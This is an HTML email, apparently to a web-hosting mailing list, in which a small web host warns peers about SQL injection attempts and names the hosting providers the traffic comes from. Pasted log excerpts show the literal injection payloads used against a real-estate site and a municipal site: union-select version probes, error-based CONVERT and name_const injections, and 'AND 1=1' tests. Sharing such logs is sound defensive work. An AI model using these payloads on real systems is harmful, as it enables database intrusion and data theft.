<html>
  <head>

    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  </head>
  <body>
    <p><font face="Calibri">Hey HT web hosts out there,</font></p>
    <p><font face="Calibri">Due to recent hacking attempts against our
        servers, I have installed an IP Tracker that tracks and blocks
        any aggressive activity.</font></p>
    <p><font face="Calibri">Starting late last week we've found a
        growing number of IP numbers that appear to be attempting SQL
        Injection attacks. I've pasted a few snippets from our logs,
        below.</font></p>
    <p><font face="Calibri">Anyone else seeing this kind of activity on
        their servers? Every time I block an IP number they move to
        another IP number. The list of IPs hitting us is growing, and
        moving across multiple hosts.<br>
      </font></p>
    <p><font face="Calibri">So far, I've contacted four different server
        hosts about the traffic coming from their servers. By far the
        most "infected" appears to be the Unified Layer family of
        hosting companies, which includes HostGator Mexico, webhostbox
        Bigrock India, and a number of others. Additional sources of the
        attacks are Hetzner.com from Germany; Ozkula from Turkey; and
        ColoCrossing from Buffalo NY. I'm sure more will be added as the
        days go on.<br>
      </font></p>
    <p><font face="Calibri">Stay safe.</font></p>
    <p><font face="Calibri">Mik<br>
      </font></p>
    <pre class="moz-signature" cols="72"><font size="-2"><font face="Courier New, Courier, monospace">94.130.76.249   13:38:44        fitzgerald-realestate.com       term=0 /%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))
94.130.76.249   13:38:45        fitzgerald-realestate.com       term=0' /z'0=A
94.130.76.249   13:38:47        fitzgerald-realestate.com       /z term=%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))
94.130.76.249   13:38:59        fitzgerald-realestate.com       /z term=0%20AND%201=1
94.130.76.249   13:39:01        fitzgerald-realestate.com       /z term=0999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
94.130.76.249   13:39:03        fitzgerald-realestate.com       /z term=099999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
94.130.76.249   13:39:04        fitzgerald-realestate.com       /z term=099999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x
94.130.76.249   13:39:06        fitzgerald-realestate.com       /z term=0%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1
94.130.76.249   13:39:07        fitzgerald-realestate.com       /z term=0%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x
94.130.76.249   13:39:09        fitzgerald-realestate.com       /z term=0%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x
</font></font></pre>
    <p><br>
    </p>
    <pre class="moz-signature" cols="72"><font size="-2"><font face="Courier New, Courier, monospace">37.247.110.108  08:14:38        Greenfield-MA.gov                       /z term=Licensing%20AND%201=1
37.247.110.108  08:14:42        Greenfield-MA.gov                       /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
37.247.110.108  08:14:44        Greenfield-MA.gov                       /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
37.247.110.108  08:14:46        Greenfield-MA.gov                       /z term=Licensing99999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x
</font></font></pre>
    <p><font face="Calibri"></font><br>
    </p>
    <pre class="moz-signature" cols="72"><font face="Courier New, Courier, monospace"><font size="-1">192.3.204.226   14:58:55        Greenfield-MA.gov                       /z term=Licensing
192.3.204.226   14:58:56        Greenfield-MA.gov                       /z term=Licensing2121121121212/1
192.3.204.226   14:58:57        Greenfield-MA.gov                       /z term=Licensing%20AND%201=1
192.3.204.226   14:58:59        Greenfield-MA.gov                       /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
192.3.204.226   14:59:00        Greenfield-MA.gov                       /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x

</font> </font></pre>
    <pre class="moz-signature" cols="72">-- 
---
Mik Muller, president
Montague WebWorks
239-R Main Street, Greenfield, MA
413-320-5336
<a class="moz-txt-link-freetext" href="http://MontagueWebWorks.com">http://MontagueWebWorks.com</a>
Powered by ROCKETFUSION</pre>
  </body>
</html>